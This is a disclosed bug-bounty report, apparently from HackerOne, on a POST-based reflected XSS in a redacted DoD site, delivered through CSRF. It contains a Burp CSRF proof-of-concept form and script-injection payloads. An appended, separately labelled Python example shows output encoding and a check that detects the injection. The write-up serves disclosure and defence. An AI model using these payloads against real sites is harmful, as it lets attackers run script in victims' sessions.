POST based RXSS on https://███████/ via ███ parameter

Disclosed: 2021-10-13 22:13:11 By nagli To deptofdefense
Medium
Vulnerability Details
Good Night DoD team,

## Summary:

I have discovered that on the following domain https://██████████/███████ there is a POST-based reflected XSS vulnerability which I can trigger with CSRF (and Clickjacking) due to unsanitized input inside the ███ parameter ██████████

## Description

The vulnerable path is: https://███████/███

CSRF HTML code for you to reproduce:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://███████/█████████" method="POST">
      <input type="hidden" name="████████" />
      <input type="hidden" name="███" />
      <input type="hidden" name="█████████" />
      <input type="hidden" name="██████████" value="&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

## Steps To Reproduce (As an attacker):

1. Navigate to https://█████████/
2. Enter arbitrary text on the field and capture the request
3. Capture the request on Burp, change the payload on the █████████ field to `"><script>alert("XSS by nagli")></script>`
4. Craft a CSRF PoC and an alert will pop upon clicking. :-)

PoC Video: ██████

## Best Regards,

nagli

## Impact

Attacker can execute JS code on the victim's behalf.
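Added example, not part of nagli's report or the affected site's code: a minimal Python model of the bug class described above (a POST parameter reflected unencoded into an attribute value) beside the hardened rendering that encodes for attribute context, with a check that a report-style `">` payload can no longer break out of the attribute. The template, the parameter name `q` and the payload are constructed for illustration.

```python
import html
import re

# Constructed payload of the same shape as the one in the report: closes the
# attribute and the tag, then injects a script element.
REPORT_STYLE_PAYLOAD = '"><script>alert(document.domain)</script>'

# Hypothetical page that echoes the submitted field back into an input value.
TEMPLATE = '<form method="POST"><input type="text" name="q" value="{value}" /></form>'


def render_vulnerable(value: str) -> str:
    """Reflects the POST parameter into the attribute with no encoding
    (the defect class in the report)."""
    return TEMPLATE.format(value=value)


def render_hardened(value: str) -> str:
    """Encodes for HTML attribute context. quote=True escapes both ' and ",
    so the value can never terminate the attribute or open a new tag."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def injected_script(page: str) -> bool:
    """Detection check: blank out every quoted attribute value, then look for a
    <script> tag in what remains. If one survives, the reflected value escaped
    its attribute and reached tag context."""
    without_attrs = re.sub(r'="[^"]*"', '=""', page)
    return "<script" in without_attrs.lower()


# Output encoding removes the XSS regardless of how the POST is delivered;
# anti-CSRF tokens / SameSite cookies are a separate layer against the
# cross-site form submission used in the PoC.
if __name__ == "__main__":
    print(injected_script(render_vulnerable(REPORT_STYLE_PAYLOAD)))  # True
    print(injected_script(render_hardened(REPORT_STYLE_PAYLOAD)))    # False
```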
Report Stats
  • Report ID: 998935
  • State: Closed
  • Substate: resolved
  • Upvotes: 32